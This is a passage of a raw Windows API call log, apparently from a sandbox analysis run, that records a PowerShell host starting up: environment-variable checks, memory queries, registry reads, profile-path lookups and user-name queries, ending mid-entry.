(cb=0x104) returned 0x343650 [0256.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.829] CoTaskMemFree (pv=0x343650) [0256.842] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.842] CoTaskMemFree (pv=0x343650) [0256.855] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.856] CoTaskMemFree (pv=0x343650) [0256.859] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0256.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0256.859] CoTaskMemFree (pv=0x343650) [0258.157] CoTaskMemAlloc (cb=0x104) returned 0x343650 [0258.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343650, nSize=0x80 | out: lpBuffer="") returned 0x0 [0258.158] CoTaskMemFree (pv=0x343650) [0258.473] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x343a90 [0259.883] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.885] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.885] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.886] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.887] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.887] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.888] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.888] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.889] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.889] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.890] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.890] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.891] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.891] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.892] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.892] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.893] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.893] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.894] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.894] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.895] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.895] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.896] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.896] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.897] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.897] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.898] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.898] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.899] VirtualQuery (in: lpAddress=0x16b470, lpBuffer=0x16c330, dwLength=0x30 | out: lpBuffer=0x16c330*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.904] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0259.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0259.905] CoTaskMemFree (pv=0x343cb0) [0259.922] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0259.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0259.924] CoTaskMemFree (pv=0x343cb0) [0260.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0260.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0260.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0260.068] VirtualQuery (in: lpAddress=0x16b720, lpBuffer=0x16c5e0, dwLength=0x30 | out: lpBuffer=0x16c5e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0260.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0260.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0260.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0260.085] VirtualQuery (in: lpAddress=0x16b720, lpBuffer=0x16c5e0, dwLength=0x30 | out: lpBuffer=0x16c5e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0260.086] VirtualQuery (in: lpAddress=0x16af70, lpBuffer=0x16be30, dwLength=0x30 | out: lpBuffer=0x16be30*(BaseAddress=0x16a000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0260.087] VirtualQuery (in: lpAddress=0x16af70, lpBuffer=0x16be30, dwLength=0x30 | out: lpBuffer=0x16be30*(BaseAddress=0x16a000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0260.094] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d578 | out: phkResult=0x16d578*=0x370) returned 0x0 [0260.095] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4fc, lpData=0x0, lpcbData=0x16d4f8*=0x0 | out: lpType=0x16d4fc*=0x1, lpData=0x0, lpcbData=0x16d4f8*=0x56) returned 0x0 [0260.095] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35290 [0260.095] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4cc, lpData=0x1ba35290, lpcbData=0x16d4c8*=0x56 | out: lpType=0x16d4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d4c8*=0x56) returned 0x0 [0260.096] CoTaskMemFree (pv=0x1ba35290) [0260.096] RegCloseKey (hKey=0x370) returned 0x0 [0260.097] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d578 | out: phkResult=0x16d578*=0x370) returned 0x0 [0260.097] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4fc, lpData=0x0, lpcbData=0x16d4f8*=0x0 | out: lpType=0x16d4fc*=0x1, lpData=0x0, lpcbData=0x16d4f8*=0x56) returned 0x0 [0260.097] CoTaskMemAlloc (cb=0x5a) returned 0x1ba35290 [0260.097] RegQueryValueExW (in: hKey=0x370, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4cc, lpData=0x1ba35290, lpcbData=0x16d4c8*=0x56 | out: lpType=0x16d4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d4c8*=0x56) returned 0x0 [0260.097] CoTaskMemFree (pv=0x1ba35290) [0260.097] RegCloseKey (hKey=0x370) returned 0x0 [0260.098] CoTaskMemAlloc (cb=0x20c) returned 0x384650 [0260.099] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x384650 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0260.099] CoTaskMemFree (pv=0x384650) [0260.099] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0260.100] CoTaskMemAlloc (cb=0x20c) returned 0x384650 [0260.100] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x384650 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0260.100] CoTaskMemFree (pv=0x384650) [0260.100] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0260.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0260.106] SetErrorMode (uMode=0x1) returned 0x1 [0260.106] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d4e0 | out: lpFileInformation=0x16d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0260.108] SetErrorMode (uMode=0x1) returned 0x1 [0260.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0260.108] SetErrorMode (uMode=0x1) returned 0x1 [0260.108] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d4e0 | out: lpFileInformation=0x16d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0260.108] SetErrorMode (uMode=0x1) returned 0x1 [0260.108] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0260.109] SetErrorMode (uMode=0x1) returned 0x1 [0260.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d4e0 | out: lpFileInformation=0x16d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0260.109] SetErrorMode (uMode=0x1) returned 0x1 [0260.109] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0260.109] SetErrorMode (uMode=0x1) returned 0x1 [0260.109] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d4e0 | out: lpFileInformation=0x16d4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0260.110] SetErrorMode (uMode=0x1) returned 0x1 [0260.118] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.118] CoTaskMemFree (pv=0x343cb0) [0260.120] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.120] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.120] CoTaskMemFree (pv=0x343cb0) [0260.122] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.122] CoTaskMemFree (pv=0x343cb0) [0260.124] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.124] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.125] CoTaskMemFree (pv=0x343cb0) [0260.140] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.140] CoTaskMemFree (pv=0x343cb0) [0260.149] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.149] CoTaskMemFree (pv=0x343cb0) [0260.156] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0260.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16d6c0 | out: lpMode=0x16d6c0) returned 1 [0260.160] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.161] CoTaskMemFree (pv=0x343cb0) [0260.167] SetEvent (hEvent=0x30c) returned 1 [0260.168] SetEvent (hEvent=0x370) returned 1 [0260.168] SetEvent (hEvent=0x390) returned 1 [0260.168] SetEvent (hEvent=0x394) returned 1 [0260.178] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0260.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0260.178] CoTaskMemFree (pv=0x343cb0) [0260.179] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d418 | out: phkResult=0x16d418*=0x39c) returned 0x0 [0260.180] RegQueryValueExW (in: hKey=0x39c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d39c, lpData=0x0, lpcbData=0x16d398*=0x0 | out: lpType=0x16d39c*=0x0, lpData=0x0, lpcbData=0x16d398*=0x0) returned 0x2 [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x378 [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3e4 [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x37c [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0262.048] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b4 [0262.049] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x404 [0262.049] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c8 [0262.049] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x414 [0262.049] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x418 [0262.049] SetEvent (hEvent=0x38c) returned 1 [0262.049] SetEvent (hEvent=0x378) returned 1 [0262.049] SetEvent (hEvent=0x3e4) returned 1 [0262.049] SetEvent (hEvent=0x3e0) returned 1 [0262.049] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x41c [0262.049] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4a8 | out: phkResult=0x16d4a8*=0x420) returned 0x0 [0262.050] RegQueryValueExW (in: hKey=0x420, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d42c, lpData=0x0, lpcbData=0x16d428*=0x0 | out: lpType=0x16d42c*=0x0, lpData=0x0, lpcbData=0x16d428*=0x0) returned 0x2 [0262.071] SetEvent (hEvent=0x388) returned 1 [0262.071] SetEvent (hEvent=0x37c) returned 1 [0262.071] SetEvent (hEvent=0x3ac) returned 1 [0262.081] CoTaskMemAlloc (cb=0x104) returned 0x343cb0 [0262.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x343cb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0262.081] CoTaskMemFree (pv=0x343cb0) [0262.112] SetEvent (hEvent=0x320) returned 1 [0262.114] CoTaskMemAlloc (cb=0x804) returned 0x1ba6ea80 [0262.114] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1ba6ea80, nSize=0x16d548 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d548) returned 0x1 [0262.114] CoTaskMemFree (pv=0x1ba6ea80) [0262.114] CoTaskMemAlloc (cb=0x204) returned 0x322b20 [0262.114] GetUserNameW (in: lpBuffer=0x322b20, pcbBuffer=0x16d588 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d588) returned 1 [0262.114] CoTaskMemFree (pv=0x322b20) [0262.115] ReportEventW 